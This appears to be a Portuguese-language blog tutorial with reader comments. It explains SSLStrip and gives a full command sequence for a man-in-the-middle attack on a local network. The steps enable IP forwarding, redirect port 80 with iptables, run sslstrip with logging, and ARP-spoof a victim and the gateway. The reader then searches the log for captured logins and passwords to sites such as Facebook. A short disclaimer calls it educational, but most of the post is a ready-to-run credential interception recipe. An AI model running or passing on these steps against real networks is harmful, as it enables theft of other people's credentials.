Entendendo e Atacando Com SSLStrip
Galera hoje iremos conhecer um pouco sobre o SSLStrip, iremos descobrir como conseguir snifar e ter acesso a dados criptografados na rede, muita gente pensa que ao utilizar o protocolo HTTPS nos sites estão 100% livres de roubo de informações, mas não é bem assim, a confiabilidade não depende somente do HTTPS, existem outros fatores envolvidos, se a vítima estiver suscetível a arp spoof nós conseguimos utilizar o SSLStrip e ter acesso “fácil” ao dados.
O SSLStrip nos permite isso, essa técnica é relativamente fácil de se aplicar e extremamente poderosa, ela funciona juntamente com o arpspoof que já vimos como funciona, para aqueles que não viram basta acessar Entendendo e Realizando Um Ataque Arp Spoof .
Quando um usuário se conecta em um site seguro ele transfere as informações criptografadas com o servidor impedindo um ataque de sniffing tradicional, quando realizamos o ataque de sslstrip primeiramente interceptamos o trafego do alvo através de técnicas man-in-the-middle, assim o atacante engana o alvo fazendo se passar por um Proxy e engana o servidor se passando pelo cliente, assim as informações são passadas para o atacante em texto puro, abaixo irei demonstrar como funciona o ataque propriamente dito, estou utilizando o Ubuntu Server 14.04 para instalar o sslstrip e um Windows como alvo. Todas as informações aqui contidas são para fins didáticos e não para causar danos e prejuízos para alguém, usem esse conhecimento com ética e responsabilidade.
Vamos para instalação, primeiramente iremos baixar o SSLStrip:
# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Depois de baixar iremos descompactar e acessar o diretório:
# tar -xvzf sslstrip-0.9.tar.gz && cd sslstrip-0.9
Agora é hora de instalar o SSLStrip
Pronto, seu SSLStrip já esta instalado, agora iremos instalar outros pacotes que ele precisa para funcionar corretamente.
# apt-get install dsniff python-twisted-web
Pronto, agora iremos começar o nosso ataque propriamente dito, primeiramente iremos habilitar o encaminhamento de pacotes para realizar o arp spoof:
# echo “1” > /proc/sys/net/ipv4/ip_forward
Depois redirecione o trafego da porta 80 para a porta que utilizaremos no sslstrip, no caso redirecionei para a porta 8080:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Agora vamos mandar o sslstrip escutar o trafego na porta 8080 e mandar ele logar tudo:
# sslstrip -a -l 8080
Depois disso em outro terminal começe o arp spoof entre a vitima e o gateway:
# arpspoof -i eth0 -t 192.168.0.55 192.168.0.1
Em outro terminal:
# arpspoof -i eth0 -t 192.168.0.1 192.168.0.55
Você pode acompanhar o trafego em outro terminal dando:
# tail -f sslstrip.log
Obs: O arquivo de log é criado no mesmo diretório onde foi executado o comando sslstrip.
Para ver as senhas procure por login ou passwd dentro do arquivo de log, não se assuste com a quantidade de informações dentro do arquivo é assim mesmo.
Obs: Se você estiver tentando capturar senhas do Gmail e a vitima estiver utilizando o Google Chrome não vai funcionar, tem que ser outro navegador como o IE por exemplo, mas o resto funciona como: facebook, terra, entre outros.
Bem pessoal é isso ai, espero que tenham gostado do post e que usem esse conhecimento com cautela, até a próxima.
- Metasploit Framework de cabo a rabo – Parte 6 - 4 de junho de 2018
- Metasploit Framework de cabo a rabo – Parte 5 - 28 de maio de 2018
- CEH – Scanning Networks – Parte 2 - 24 de maio de 2018
Saudações!
Sempre que uso o sslstrip, o host da vítima não navega, se a vítima não navega, não terá o que capturar. Isso é normal?
Você fez # echo “1” > /proc/sys/net/ipv4/ip_forward?
Sim.
Log do sslstrip em branco.
o arquivo de sslstip.log esta em branco alguem pode me ajudar ?
Muito bom , funcionou perfeitamente , ótimo ataque MTIM
Boa tarde,
Eu não estou conseguindo entender..
Se o objetivo é capturar o acesso HTTPS (443), o que adianta eu redirecionar o tráfego da porta 80?